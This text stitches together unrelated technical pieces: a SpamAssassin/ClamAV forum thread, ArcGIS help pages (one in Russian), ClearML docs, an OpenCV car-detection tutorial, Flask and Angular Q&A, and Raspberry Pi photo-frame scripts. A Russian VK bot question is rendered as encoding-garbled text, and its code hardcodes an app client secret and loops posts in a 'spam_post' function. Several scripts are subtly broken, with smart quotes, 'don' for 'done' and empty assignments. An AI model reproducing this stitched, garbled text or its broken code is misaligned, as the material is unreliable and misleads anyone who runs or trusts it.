# ClamAV SecuriteInfo.com VX malware signatures from
# http://www.securiteinfo.com/services/clamav_unofficial_malwares_signatures.shtml
meta CLAMAV_VX (CLAMAV && __CLAMAV_VX)
describe CLAMAV_VX Malware found by SecuriteInfo.com VX signatures
score CLAMAV_VX 5.0
Hi Matt,
I know it has already passed few months. I want to know on where is the location to put your custom.cf? Is it under user directory (~\.spamassasin)?
Is it ok to put the whitelist_from rules in local.cf?
Yep a few months, and I've changed since then
I have a whitelist.cf for just my whiteliest entries
I have the KAM rule set in KAM.cf >> https://www.pccc.com/downloads/SpamAssassin/contrib/
I have non-KAM rules from same source
I have a zzLast.cf to negate any rules that auto created from the above two lists
I have a blacklist.cf, a matt.cf, a nerds.cf (does the country of origin stuff) and more.
Seems you can have multiple .cf files, and they ALL get read individually
All of these are in my /etc/spamassassin/ folder on my UBUNTU system. I don't use the Jam Software windows variant of SpamAssassin
I have a whitelist.cf for just my whiteliest entries
I have the KAM rule set in KAM.cf >> https://www.pccc.com/downloads/SpamAssassin/contrib/
I have non-KAM rules from same source
I have a zzLast.cf to negate any rules that auto created from the above two lists
I have a blacklist.cf, a matt.cf, a nerds.cf (does the country of origin stuff) and more.
Seems you can have multiple .cf files, and they ALL get read individually
All of these are in my /etc/spamassassin/ folder on my UBUNTU system. I don't use the Jam Software windows variant of SpamAssassin
Just 'cause I link to a page and say little else doesn't mean I am not being nice.
https://www.hmailserver.com/documentation
https://www.hmailserver.com/documentation
Its similar on the windows version. In JAM the local.cf is found in (default)mattg wrote: All of these are in my /etc/spamassassin/ folder on my UBUNTU system. I don't use the Jam Software windows variant of SpamAssassin
. Place other custom .CFs here too.
C:\Program Files\JAM Software\SpamAssassin for Windows\etc\spamassassin
5.7 on test.
AV:
SpamassassinForWindows 3.4.0spamd service
AV:
Clamwin+Clamdservice +sanesecurity defs: https://www.hmailserver.com/forum/viewtopic.php?f=21&t=26829
The file path.config in the SpamAssassin directory will specify locations..jimimaseye wrote:Its similar on the windows version. In JAM the local.cf is found in (default)mattg wrote: All of these are in my /etc/spamassassin/ folder on my UBUNTU system. I don't use the Jam Software windows variant of SpamAssassin. Place other custom .CFs here too.C:\Program Files\JAM Software\SpamAssassin for Windows\etc\spamassassin
Code: Select all
DEF_RULES_DIR=./share/spamassassin
LOCAL_RULES_DIR=./etc/spamassassin
LOCAL_STATE_DIR=./share
SørenR.
Word used by programmers when they do not want to explain what they did.
Algorithm(noun.)
Word used by programmers when they do not want to explain what they did.
|
(Dont be intimidated by length of code chunks, I included all of my guess as to what's going on, so most of it is just stuff to skim over)
The folder similarities contains static and template folders (which are probably irrelevant to this question) application.py, helpers.py, compare and requirements.txt(irrelevant again).
Now I vaguely understand that somehow the command flask run in the terminal runs application.py through $FLASK_APP being set to it in the IDE. I also see that helpers.py is linked to this through
from helpers import lines, sentences, substrings
at the top of application.py. However, how is compare linked to any of this stuff? I can't find it at the top of application.py. See below
import cs50
import re
from flask import Flask, abort, redirect, render_template, request
from html import escape
from werkzeug.exceptions import default_exceptions, HTTPException
from helpers import lines, sentences, substrings
# Web app
app = Flask(__name__)
Here are my guesses as to what is going on:
GUESS 1
flask run doesn't only run application.py but everything in the folder it's being run in, and thus compare is run
I can only assume that somehow the following lines of code compareat the top and bottom of the compare file play a role
#!/usr/bin/env python3
if __name__ == "__main__":
main()
GUESS 2
Somehow the code in the 'body' of application.py calls compare in a subtle way I'm not picking up. Here are some lines of code that I believe are the main suspects.
@app.route("/compare", methods=["POST"])
def compare():
"""Handle requests for /compare via POST"""
Otherwise I have no clue
|
Доступно с лицензией Spatial Analyst.
Сводка
Оценивает по принципу «ячейка-за-ячейкой», во сколько раз набор растров больше, чем другой растр.
Иллюстрация
Использование
В перечне входных растров может быть задано произвольное число растров.
Если для параметра Входной растр значений (in_value_raster в Python) указан многоканальный растр, будет использован только первый канал. Чтобы обработать другой канал, укажите его.
Если многоканальный растр указан как один из входных для параметра Входные растры (in_rasters в Python), будут обработаны все каналы.
Чтобы обработать выбранные каналы многоканального растра, сначала создайте новый набор растровых данных, состоящий только из необходимых каналов, с помощью инструмента Объединить каналы, затем укажите полученный набор как Входной растр (in_rasters в Python).
Если значение ячейки на любом из входных растров – NoData, местоположению этой ячейки на выходном растре будет также присвоено значение NoData.
Выходной растр всегда будет целочисленным.
См. раздел Среда анализа и Spatial Analyst для получения дополнительной информации о среде геообработки данного инструмента.
Синтаксис
GreaterThanFrequency(in_value_raster, in_rasters)
Parameter Объяснение Тип данных
in_value_raster
Для каждой ячейки входного растра значений определяется количество раз, когда значения из набора растров больше.
Raster Layer
in_rasters
[in_raster,...]
Список растров, с которым сравнивается входной растр.
Raster Layer
Значение отраженного сигнала
Name Объяснение Тип данных
out_raster
Выходной растр.
Для каждой ячейки выходного растра значение представляет количество раз, когда соответствующие ячейки из набора растров больше,чем растр значений.
Raster
Пример кода
Частота больше чем. Пример 1 (окно Python)
В этом примере оценивается количество раз, когда набор входных растров грида больше другого растра, в результате чего получается растр TIFF.
import arcpy from arcpy import env from arcpy.sa import * env.workspace = "C:/sapyexamples/data" outGTF = GreaterThanFrequency("cost", ["degs", "negs", "fourgrd"]) outGTF.save("C:/sapyexamples/output/outgtf.tif")
GreaterThanFrequency, пример 2 (автономный скрипт)
В этом примере оценивается количество раз, когда набор входных растров грида больше другого растра, в результате чего получается растр грида.
# Name: GreaterThanFrequency_Ex_02.py # Description: Evaluates the number of times a set of rasters is # greater than another raster on a cell-by-cell basis # Requirements: Spatial Analyst Extension # Import system modules import arcpy from arcpy import env from arcpy.sa import * # Set environment settings env.workspace = "C:/sapyexamples/data" # Set local variables inValueRaster = "cost" inRaster01 = "degs" inRaster02 = "negs" inRaster03 = "fourgrd" # Check out the ArcGIS Spatial Analyst extension license arcpy.CheckOutExtension("Spatial") # Execute GreaterThanFrequency outGTF = GreaterThanFrequency(inValueRaster, [inRaster01, inRaster02, inRaster03]) # Save the output outGTF.save("C:/sapyexamples/output/outgtf")
Environments
Информация о лицензиях
Basic: Требуется Spatial Analyst
Standard: Требуется Spatial Analyst
Advanced: Требуется Spatial Analyst
|
PyTorch Distributed
Trains is now ClearML
This documentation applies to the legacy Trains versions. For the latest documentation, see ClearML.
The pytorch_distributed_example.py script demonstrates integrating Trains into code that uses the PyTorch Distributed Communications Package (torch.distributed). This script initializes a main Task and spawns subprocesses, each for an instances of that Task. The Task in each subprocess trains a neural network over a partitioned dataset (the torchvision built-in MNIST dataset), and reports the following to the main Task:
Artifacts - A dictionary containing different key-value pairs is uploaded from the Task in each subprocess to the main Task.
Scalars - Loss reported as a scalar during training in each Task in a subprocess is logged in the main Task.
Hyperparameters - Hyperparameters created in each Task in a subprocess are added to the hyperparameters in the main Task.
Each Task in a subprocess references the main Task by calling Task.current_task, which always returns the main Task.
When the script runs, it creates an experiment named test torch distributed which is associated with the examples project in the Trains Web (UI).
Artifacts
The example uploads a dictionary as an artifact in the main Task by calling the Task.upload_artifact method on Task.current_task (the main Task). The dictionary contains the dist.rank of the subprocess, making each unique.
Task.current_task().upload_artifact(
'temp {:02d}'.format(dist.get_rank()), artifact_object={'worker_rank': dist.get_rank()})
All of these artifacts appear in the main Task, ARTIFACTS > OTHER.
Scalars
We report loss to the main Task by calling the Logger.report_scalar method on Task.current_task().get_logger, which is the logger for the main Task. Since we call Logger.report_scalar with the same title (loss), but a different series name (containing the subprocess' rank), all loss scalar series are logged together.
Task.current_task().get_logger().report_scalar(
'loss', 'worker {:02d}'.format(dist.get_rank()), value=loss.item(), iteration=i)
The single scalar plot for loss appears in RESULTS > SCALARS.
Hyperparameters
Trains automatically logs the argparse command line options. Since we call Task.connect method on Task.current_task, they are logged in the main Task. We use a different hyperparameter key in each subprocess, so that they do not overwrite each other in the main Task.
param = {'worker_{}_stuff'.format(dist.get_rank()): 'some stuff ' + str(randint(0, 100))}
Task.current_task().connect(param)
All the hyperparameters appear in CONFIGURATIONS > HYPER PARAMETERS.
Log
Output to the console, including the text messages printed from the main Task object and each subprocess appear in RESULTS > LOG.
|
Summary
Joins attributes from one feature to another based on the spatial relationship. The target features and the joined attributes from the join features are written to the output feature class.
Usage
A spatial join involves matching rows from the Join Features to the Target Features based on their relative spatial locations.
By default, all attributes of the join features are appended to attributes of the target features and copied over to the output feature class. You can define which of the attributes will be written to the output by manipulating them in the Field Map of Join Features parameter.
Two new fields, Join_Count and TARGET_FID, are always added to the output feature class. Join_Count indicates how many join features match each target feature (TARGET_FID).
Another new field, JOIN_FID, is added to the output when JOIN_ONE_TO_MANY is specified in the Join Operation parameter.
When the Join Operation parameter is JOIN_ONE_TO_MANY, there can be more than one row in the output feature class for each target feature. The JOIN_FID field makes it easier to determine which feature is joined to which target feature (TARGET_FID). A value of -1 for JOIN_FID field means no feature meets the specified spatial relationship with the target feature.
All input target features are written to the output feature class only if:
The Join Operation is set to JOIN_ONE_TO_ONE, and
Keep All Target Features is checked (join_type = "KEEP_ALL" in Python).
Merge rules specified in the Field Map of Join Features parameter only apply to attributes from the join features and when more than one feature is matched to a target feature (when Join_Count > 1). For example, if three features with DEPTH attribute values of 15.5, 2.5, and 3.3 are joined, and a merge rule of Mean is applied, the output field will have a value of 6.1. Null values in join fields are ignored for statistic calculation. For example, 15.5, <null>, and 2.5 will result in 9.0 for Mean and 2 for Count.
When the Match Option is set to CLOSEST or CLOSEST_GEODESIC, it is possible that two or more join features are at the same distance from the target feature. When this situation occurs, one of the join features is randomly selected as the matching feature (the join feature's FID does not influence this random selection). If you want to find the 2
nd, 3rd, orNclosest feature, use the Generate Near Table tool.th
If a join feature has a spatial relationship with multiple target features, then it is counted as many times as it is matched against the target feature. For example, if a point is within three polygons, then the point is counted three times, once for each polygon.
For more information about using the three-dimensional spatial relationships INTERSECT_3D and WITHIN_A_DISTANCE_3D see Select by Location 3D relationships.
Syntax
SpatialJoin_analysis (target_features, join_features, out_feature_class, {join_operation}, {join_type}, {field_mapping}, {match_option}, {search_radius}, {distance_field_name})
Parameter Explanation Data Type
target_features
Attributes of the target features and the attributes from the joined features are transferred to the output feature class. However, a subset of attributes can be defined in the field map parameter.
Feature Layer
join_features
The attributes from the join features are joined to the attributes of the target features. See the explanation of the join_operation parameter for details on how the aggregation of joined attributes are affected by the type of join operation.
Feature Layer
out_feature_class
A new feature class containing the attributes of the target and join features. By default, all attributes of target features and the attributes of the joined features are written to the output. However, the set of attributes to be transferred can be controlled by the field map parameter.
Feature Class
join_operation
(Optional)
Determines how joins between the target features and join features will be handled in the output feature class if multiple join features are found that have the same spatial relationship with a single target feature.
String
join_type
(Optional)
Determines if all target features will be maintained in the output feature class (known as outer join), or only those that have the specified spatial relationship with the join features (inner join).
Boolean
field_mapping
(Optional)
Controls what attribute fields will be in the output feature class. The initial list contains all the fields from both the target features and the join features. Fields can be added, deleted, renamed, or have their properties changed. The selected fields from the target features are transferred as is, but selected fields from the join features can be aggregated by a merge rule. For details on field mapping, see Using the field mapping controland Mapping input fields to output fields. Multiple fields and statistic combination may be specified.
Field Mappings
match_option
(Optional)
Defines the criteria used to match rows. The match options are:
String
search_radius
(Optional)
Join features within this distance of a target feature will be considered for the spatial join. A search radius is only valid when the spatial relationship (Match Option) INTERSECT, WITHIN_A_DISTANCE, WITHIN_A_DISTANCE_GEODESIC, HAVE_THEIR_CENTER_IN, CLOSEST or CLOSEST_GEODESIC is specified. Using a search radius of 100 meters with the spatial relationship WITHIN_A_DISTANCE will join feature within 100 meters of a target feature. For the three WITHIN_A_DISTANCE relationships, if no value is specified for search radius then a distance of 0 is used.
Linear unit
distance_field_name
(Optional)
The name of a field to be added to the output feature class, which contains the distance between the target feature and the closest join feature. This option is only valid when the spatial relationship (Match Option) CLOSEST or CLOSEST_GEODESIC is specified. The value of this field is -1 if no feature is matched within a search radius. If no field name is specified, the field will not be added to the output feature class.
String
Code sample
SpatialJoin example 1 (Python window)
The following script demonstrates how to use the SpatialJoin function in a Python window.
import arcpy target_features = "C:/data/usa.gdb/states" join_features = "C:/data/usa.gdb/cities" out_feature_class = "C:/data/usa.gdb/states_cities" arcpy.SpatialJoin_analysis(target_features, join_features, out_feature_class)
SpatialJoin example 2 (stand-alone script)
The following stand-alone script demonstrates how to use SpatialJoin to join attributes of cities to states.
# Name: SpatialJoin_Example2.py # Description: Join attributes of cities to states based on spatial relationships. # Requirements: os module # Import system modules import arcpy import os # Set local variables workspace = r"C:\gpqa\mytools\spatialjoin\usa.gdb" outWorkspace = r"C:\gpqa\mytools\spatialjoin\output.gdb" # Want to join USA cities to states and calculate the mean city population # for each state targetFeatures = os.path.join(workspace, "states") joinFeatures = os.path.join(workspace, "cities") # Output will be the target features, states, with a mean city population field (mcp) outfc = os.path.join(outWorkspace, "states_mcp2") # Create a new fieldmappings and add the two input feature classes. fieldmappings = arcpy.FieldMappings() fieldmappings.addTable(targetFeatures) fieldmappings.addTable(joinFeatures) # First get the POP1990 fieldmap. POP1990 is a field in the cities feature class. # The output will have the states with the attributes of the cities. Setting the # field's merge rule to mean will aggregate the values for all of the cities for # each state into an average value. The field is also renamed to be more appropriate # for the output. pop1990FieldIndex = fieldmappings.findFieldMapIndex("POP1990") fieldmap = fieldmappings.getFieldMap(pop1990FieldIndex) # Get the output field's properties as a field object field = fieldmap.outputField # Rename the field and pass the updated field object back into the field map field.name = "mean_city_pop" field.aliasName = "mean_city_pop" fieldmap.outputField = field # Set the merge rule to mean and then replace the old fieldmap in the mappings object # with the updated one fieldmap.mergeRule = "mean" fieldmappings.replaceFieldMap(pop1990FieldIndex, fieldmap) # Delete fields that are no longer applicable, such as city CITY_NAME and CITY_FIPS # as only the first value will be used by default x = fieldmappings.findFieldMapIndex("CITY_NAME") fieldmappings.removeFieldMap(x) y = fieldmappings.findFieldMapIndex("CITY_FIPS") fieldmappings.removeFieldMap(y) #Run the Spatial Join tool, using the defaults for the join operation and join type arcpy.SpatialJoin_analysis(targetFeatures, joinFeatures, outfc, "#", "#", fieldmappings)
Environments
Licensing information
ArcGIS Desktop Basic: Yes
ArcGIS Desktop Standard: Yes
ArcGIS Desktop Advanced: Yes
|
I'm a Mechatronics engineer | Pro Python Developer | AI Enthusiast
In this article, I will guide you on how to do real-time vehicle detection in python using the OpenCV library and trained cascade classifier in just a few lines of code.
a brief about vehicle detection
Real-time vehicle detection is one of the many application of object detection, whereby focuses on detecting cars within an image together with the location coordinates.
where is being used?
In this tutorial, we will learn how to perform Real-time vehicle detection in a video or from camera streams using OpenCV and a pre-trained cascade model.
To able to follow through with this tutorial you’re supposed to have the following on your machine
installation
$ pip install opencv-python
Pre-trained Cascade classifier
As I have explained earlier, we are not going to be training our model to spot cars in video frames from scratch instead we gonna use a pre-trained one.
These trained cascade classifiers are usually being stored in the XML format, therefore you should download the cascade that was trained to detect cars and have it in the project directory.
To download the trained cascade mode click-here
Demo video with cars in it
You can actually use any video you want as long it has cars in it, the cascade model will be able to detect them.
If you would like to use the same video I used for this article Download here;
Project Directory
Your project directory should look like this
.├── app.py├── cars.mp4└── haarcascade_car.xml
Now let's begin by building what we have just talked about, using you have the XML Model and demo video on your project directory.
Loading our Model
use cv2.CascadeClassifier() to load the trained haarcascade model as shown in the code below.
import cv2
cars_cascade = cv2.CascadeClassifier('haarcascade_car.xml')
Detecting cars in a video
we will use the detectMultiScale () method to detect and to get the coordinates of vehicles in the video frames.
The detectMultiScale () method receives 3 parameters to actually give your coordinates as shown below
Grayscale image specify the image to be processed, in our case a grayscale image is going to be image fetched from the video streams.
ScaleFactor specify how much the image size is reduced at each image scale, you can learn more about it here, a good value is mostly chosen as 1.05
minNeighbors specify how many neighbors each candidate rectangle should have to retain it, this parameter will affect the quality of the detected faces.
A higher value results in fewer detections but with higher quality usually, 3-6 is a good value for it
Syntax to detect cars + their positional coordinates
cars = cars_cascade.detectMultiScale(frame, scaleFactor, minNeighbors)
When you run the above line of code it will perform cars detection in the frame image and then return to us all coordinates of cars found (diagonal coordinates point).
Drawing rectangle around detected cars
After detecting all the coordinates of all the cars in a frame, we to draw a rectangle around it for us to able to see the detection process visually.
We will use the cv2.rectangle() method to draw a rectangle around every detected car using diagonal coordinate points returned by our cascade classifier.
Syntax to use the cv2.rectangle () method
cv2.rectangle(frame , point1, point2, color = (), thickness=value)
We need to condense what we just learned and put into a single function that receives image frames and then draws rectangles around it using the detected coordinates just as shown below.
def detect_cars(frame):
cars = cars_cascade.detectMultiScale(frame, 1.15, 4)
for (x, y, w, h) in cars:
cv2.rectangle(frame, (x, y), (x+w,y+h), color=(0, 255, 0), thickness=2)
return frame
Building a function to simulate the detection process
finally let's add a single function to simulate the whole process from loading the video, to perform vehicle detection by calling the detect_cars function, and then render a frame with detected vehicles on the screen.
def Simulator():
CarVideo = cv2.VideoCapture('cars.mp4')
while CarVideo.isOpened():
ret, frame = CarVideo.read()
controlkey = cv2.waitKey(1)
if ret:
cars_frame = detect_cars(frame)
cv2.imshow('frame', cars_frame)
else:
break
if controlkey == ord('q'):
break
CarVideo.release()
cv2.destroyAllWindows()
Add these two lines so as we make sure that we are running our python code as a script.
if __name__ == '__main__':
Simulator()
Let's bundle everything together
Now we know how to do each independent piece of our detection script, it's time to put them together so as we can run it.
Once you put all the concept we learned above into one app.py, your code is going to look just as shown below
import cv2
cars_cascade = cv2.CascadeClassifier('haarcascade_car.xml')
def detect_cars(frame):
cars = cars_cascade.detectMultiScale(frame, 1.15, 4)
for (x, y, w, h) in cars:
cv2.rectangle(frame, (x, y), (x+w,y+h), color=(0, 255, 0), thickness=2)
return frame
def Simulator():
CarVideo = cv2.VideoCapture('cars.mp4')
while CarVideo.isOpened():
ret, frame = CarVideo.read()
controlkey = cv2.waitKey(1)
if ret:
cars_frame = detect_cars(frame)
cv2.imshow('frame', cars_frame)
else:
break
if controlkey == ord('q'):
break
CarVideo.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
Simulator()
We have reached the end of our article, hope you learned something, now share it with your fellow friends on Twitter and other developer communities
Follow me on Twiter
I recommend you to also check this;
Create your free account to unlock your custom reading experience.
|
ÐÑÑаÑÑÑ Ð½Ð°Ð¿Ð¸ÑаÑÑ Ð±Ð¾Ñа, коÑоÑÑй Ð±Ñ Ð¿Ð¾ÑÑил ÑекÑÑ Ð² гÑÑппе Ñ Ð¾ÑкÑÑÑой ÑÑенной, ÑÑолкнÑлÑÑ Ñ Ð¿Ñоблемой.
vk_api возвÑаÑÐ°ÐµÑ Ð¼Ð½Ðµ оÑÐ¸Ð±ÐºÑ 214:
ÐÑбликаÑÐ¸Ñ Ð·Ð°Ð¿ÑеÑена. ÐÑевÑÑен Ð»Ð¸Ð¼Ð¸Ñ Ð½Ð° ÑиÑло пÑбликаÑий в ÑÑÑки, либо на Ñказанное вÑÐµÐ¼Ñ Ñже запланиÑована дÑÑÐ³Ð°Ñ Ð·Ð°Ð¿Ð¸ÑÑ, либо Ð´Ð»Ñ ÑекÑÑего полÑзоваÑÐµÐ»Ñ Ð½ÐµÐ´Ð¾ÑÑÑпно ÑазмеÑение запиÑи на ÑÑой ÑÑене
ÐеÑоÑÑно Ñ ÑÑплÑ, но не Ð¼Ð¾Ð³Ñ Ð¿Ð¾Ð½ÑÑÑ Ð¸Ð·-за Ñего он вÑÐ´Ð°ÐµÑ ÑÑÑ Ð¾ÑибкÑ, Ñ.к поÑÑиÑÑ Ð¿ÑÑаÑÑÑ Ð² гÑÑппе c оÑкÑÑÑой ÑÑеной.
import vk_api
from typing import Any
from vk_api import VkUpload
from vk_api.longpoll import VkLongPoll, VkEventType
from vk_api.utils import get_random_id
from requests import get as request
import random
import getpass
login = 'nu nu nu'
tokenAddress = "https://oauth.vk.com/token?grant_type=password&client_id=2274003&client_secret=hHbZxrka2uZ6jB1inYsH&username=%s&password=%s"
resp = request(tokenAddress % (login, ("nu nu nu"))).json()
mainUserId = 'nu nu nu'
is_start = False
# ÐÐ²Ñ‚Ð¾Ñ€Ð¸Ð·Ð°Ñ†Ð¸Ñ Ð¸ получение токена "Implicit flow"
vk_session = vk_api.VkApi(token=resp["access_token"])
vk = vk_session.get_api()
def spam_post():
for i in range(0,3):
vk.wall.post(owner_id=nu nu nu, message="вÑе получилоÑÑŒ")
spam_post()
|
I'm building a front-end in angular that is accessing a flask/python RESTful API. I'm using AngularJS v1.2.16.
For some reason, it takes an insane amount of time before the REST resource is loaded, with most of the time just waiting. It's my understanding that 'waiting' is measuring the time to first byte - all my services run locally (the frontend, API and database).
Given that the services all run locally, I am at a loss how to debug this. Does anybody have any tips on where to look? I checked all my methods and they run decently fast (under 100ms per REST call). When I use postman, the API returns near-instantly.
Any ideas how to fix the wait, it only seems to be the case when loading the RESTful resource via angular. The angular $http get request is fairly straight forward:
myAppControllers.controller('ManageCtrl', ['$scope', '$http',
function($scope, $http) {
$http({
url: 'http://127.0.0.1:5000/v1/domains/',
method: "GET",
headers: { 'Content-Type': 'application/json' },
}).
success(function(data, status, headers, config) {
console.log('login successful');
console.log(status);
console.log(data);
}).
error(function(data, status, headers, config) {
console.log('login failed');
});
}]);
I've run into the same issue (Angular frontend running in Chrome and Flask backend). After trying both Angular 1.2.x and 1.3.x, and a billion other permutations, the only "solution" I've found is to run the Flask backend with the Tornado web server (http://www.tornadoweb.org/en/stable/). Other WSGI containers may work, but this is the one I tested.
In your Flask application, paste the following:
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
if __name__ == '__main__':
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(5000)
IOLoop.instance().start()
You can start your web server by typing:
python myserver.py
|
Intro
All my spouse’s digital photo frames are either broken or nearly broken – probably she got them from garage sales. Regardless, they spend 99% of the the time black. Now, since I had bought that Raspberry Pi PiDisplay awhile back, and it is underutilized, and I know a thing or two about linux, I felt I could create a custom photo frame with things I already have lying around – a Raspberry Pi 3, a PiDisplay, and my personal Google Drive. We make a point to copy all our cameras’ pictures onto the Google Drive, which we do the old-fashioned, by-hand way. After 17 years of digital photos we have about 40,000 of them, over 200 GB.
So I also felt obliged to create features you will never have in a commercial product, to make the effort worthwhile. I thought, what about randomly picking a few for display from amongst all the pictures, displaying that subset for a few days, and then moving on to a new randomly selected sample of images, etc? That should produce a nice review of all of them over time, eventually. You need an approach like that because you will never get to the end if you just try to display 40000 images in order!
Equipment
This work was done on a Raspberry Pi 3 running Raspbian Lite (more on that later). I used a display custom-built for the RPi, Amazon.com: Raspberry Pi 7″ Touch Screen Display: Electronics), though I believe any HDMI display would do.
The scripts
Here is the master file which I call master.sh.
#!/bin/sh
# DrJ 8/2019
# call this from cron once a day to refesh random slideshow once a day
RANFILE=”random.list”
NUMFOLDERS=20
DISPLAYFOLDER=”/home/pi/Pictures”
DISPLAYFOLDERTMP=”/home/pi/Picturestmp”
SLEEPINTERVAL=3
DEBUG=1
STARTFOLDER=”MaryDocs/Pictures and videos”
echo “Starting master process at “`date`
rm -rf $DISPLAYFOLDERTMP
mkdir $DISPLAYFOLDERTMP
#listing of all Google drive files starting from the picture root
if [ $DEBUG -eq 1 ]; then echo Listing all files from Google drive; fi
rclone ls remote:”$STARTFOLDER” > files
# filter down to only jpegs, lose the docs folders
if [ $DEBUG -eq 1 ]; then echo Picking out the JPEGs; fi
egrep ‘\.[jJ][pP][eE]?[gG]$’ files |awk ‘{$1=””; print substr($0,2)}’|grep -i -v /docs/ > jpegs.list
# throw NUMFOLDERS or so random numbers for picture selection, select triplets of photos by putting
# names into a file
if [ $DEBUG -eq 1 ]; then echo Generate random filename triplets; fi
./random-files.pl -f $NUMFOLDERS -j jpegs.list -r $RANFILE
# copy over these 60 jpegs
if [ $DEBUG -eq 1 ]; then echo Copy over these random files; fi
cat $RANFILE|while read line; do
rclone copy remote:”${STARTFOLDER}/$line” $DISPLAYFOLDERTMP
sleep $SLEEPINTERVAL
done
# rotate pics as needed
if [ $DEBUG -eq 1 ]; then echo Rotate the pics which need it; fi
cd $DISPLAYFOLDERTMP; ~/rotate-as-needed.sh
cd ~
# kill any qiv slideshow
if [ $DEBUG -eq 1 ]; then echo Killing old qiv and fbi slideshow; fi
pkill -9 -f qiv
sudo pkill -9 -f fbi
pkill -9 -f m2.pl
# remove old pics
if [ $DEBUG -eq 1 ]; then echo Removing old pictures; fi
rm -rf $DISPLAYFOLDER
mv $DISPLAYFOLDERTMP $DISPLAYFOLDER
#run looping fbi slideshow on these pictures
if [ $DEBUG -eq 1 ]; then echo Start fbi slideshow in background; fi
cd $DISPLAYFOLDER ; nohup ~/m2.pl >> ~/m2.log 2>&1 &
if [ $DEBUG -eq 1 ]; then echo “And now it is “`date`; fi
I call the following script random-files.pl:
#!/usr/bin/perl
use Getopt::Std;
my %opt=();
getopts("c:df:j:r:",\%opt);
$nofolders = $opt{f} ? $opt{f} : 20;
$DEBUG = $opt{d} ? 1 : 0;
$cutoff = $opt{c} ? $opt{c} : 5;
$cutoffS = 60*$cutoff;
$jpegs = $opt{j} ? $opt{j} : "jpegs.list";
$ranpicfile = $opt{r} ? $opt{r} : "jpegs-random.list";
print "d,f,j,r: $opt{d}, $opt{f}, $opt{j}, $opt{r}\n" if $DEBUG;
open(JPEGS,$jpegs) || die "Cannot open jpegs listing file $jpegs!!\n";
@jpegs = ;
# remove newline character
$nopics = chomp @jpegs;
open(RAN,"> $ranpicfile") || die "Cannot open random picture file $ranpicfile!!\n";
for($i=0;$i<$nofolders;$i++) {
$t = int(rand($nopics-2));
print "random number is: $t\n" if $DEBUG;
# a lot of our pics follow this naming convention
# 20160831_090658.jpg
($date,$time) = $jpegs[$t] =~ /(\d{8})_(\d{6})/;
if ($date) {
print "date, time: $date $time\n" if $DEBUG;
# ensure neighboring picture is at least five minutes different in time
$iPO = $iP = $diff = 0;
($hr,$min,$sec) = $time =~ /(\d\d)(\d\d)(\d\d)/;
$secs = 3600*$hr + 60*$min + $sec;
print "Pre-pic logic\n";
while ($diff < $cutoffS) {
$iP++;
$priorPic = $jpegs[$t-$iP];
$Pdate = $Ptime = 0;
($Pdate,$Ptime) = $priorPic =~ /(\d{8})_(\d{6})/;
($Phr,$Pmin,$Psec) = $Ptime =~ /(\d\d)(\d\d)(\d\d)/;
$Psecs = 3600*$Phr + 60*$Pmin + $Psec;
print "hr,min,sec,Phr,Pmin,Psec: $hr,$min,$sec,$Phr,$Pmin,$Psec\n" if $DEBUG;
$diff = abs($secs - $Psecs);
print "diff: $diff\n" if $DEBUG;
# end our search if we happened upon different dates
$diff = 99999 if $Pdate ne $date;
}
# post-picture logic - same as pre-picture
print "Post-pic logic\n";
$diff = 0;
while ($diff < $cutoffS) {
$iPO++;
$postPic = $jpegs[$t+$iPO];
$Pdate = $Ptime = 0;
($Pdate,$Ptime) = $postPic =~ /(\d{8})_(\d{6})/;
($Phr,$Pmin,$Psec) = $Ptime =~ /(\d\d)(\d\d)(\d\d)/;
$Psecs = 3600*$Phr + 60*$Pmin + $Psec;
print "hr,min,sec,Phr,Pmin,Psec: $hr,$min,$sec,$Phr,$Pmin,$Psec\n" if $DEBUG;
$diff = abs($Psecs - $secs);
print "diff: $diff\n" if $DEBUG;
# end our search if we happened upon different dates
$diff = 99999 if $Pdate ne $date;
}
} else {
$iP = $iPO = 2;
}
$priorPic = $jpegs[$t-$iP];
$Pic = $jpegs[$t];
$postPic = $jpegs[$t+$iPO];
print RAN qq($priorPic
$Pic
$postPic
);
}
close(RAN);
Bunch of simple python scripts
I call this one getinfo.py:
#!/usr/bin/python3
import os,sys
from PIL import Image
from PIL.ExifTags import TAGS
for (tag,value) in Image.open(sys.argv[1])._getexif().items():
print (‘%s = %s’ % (TAGS.get(tag), value))
print (‘%s = %s’ % (TAGS.get(tag), value))
And here’s rotate.py:
#!/usr/bin/python3
import PIL, os
import sys
from PIL import Image
picture= Image.open(sys.argv[1])
# if orientation is 6, rotate clockwise 90 degrees
picture.rotate(-90,expand=True).save(“rot_” + sys.argv[1])
While here is rotatecc.py:
#!/usr/bin/python3
import PIL, os
import sys
from PIL import Image
picture= Image.open(sys.argv[1])
# if orientation is 8, rotate counterclockwise 90 degrees
picture.rotate(90,expand=True).save(“rot_” + sys.argv[1])
And rotate-as-needed.sh:
#!/bin/sh
# DrJ 12/2020
# some of our downloaded files will be sideways, and fbi doesn’t auto-rotate them as far as I know
# assumption is that are current directory is the one where we want to alter files
ls -1|while read line; do
echo fileis “$line”
o=`~/getinfo.py “$line”|grep -i orientation|awk ‘{print $NF}’`
echo orientation is $o
if [ “$o” -eq “6” ]; then
echo “90 clockwise is needed, o is $o”
# rotate and move it
~/rotate.py “$line”
mv rot_”$line” “$line”
elif [ “$o” -eq “8” ]; then
echo “90 counterclock is needed, o is $o”
# rotate and move it
~/rotatecc.py “$line”
mv rot_”$line” “$line”
fi
don
And finally, m2.pl:
#!/usr/bin/perl
# show the pics ; rotate the screen as needed
# for now, assume the display is in a neutral
# orientation at the start
use Time::HiRes qw(usleep);
$DEBUG = 1;
$delay = 6; # seconds between pics
$mdelay = 200; # milliseconds
$mshow = "$ENV{HOME}/mediashow";
$pNames = "$ENV{HOME}/pNames";
# pics are here
$picsDir = "$ENV{HOME}/Pictures";
chdir($picsDir);
system("ls -1 > $pNames");
# forther massage names
open(TMP,"$pNames");
@lines = ;
foreach (@lines) {
chomp;
$filesNullSeparated .= $_ . "\0";
}
open(MS,">$mshow") || die "Cannot open mediashow file $mshow!!\n";
print MS $filesNullSeparated;
close(MS);
print "filesNullSeparated: $filesNullSeparated\n" if $DEBUG;
$cn = @lines;
print "$cn files\n" if $DEBUG;
# throw up a first picture - all black. Trick to make black bckgrd permanent
system("sudo fbi -a --noverbose -T 1 $ENV{HOME}/black.jpg");
system("sudo fbi -a --noverbose -T 1 $ENV{HOME}/black.jpg");
sleep(1);
system("sleep 2; sudo killall fbi");
# start infinitely looping fbi slideshow
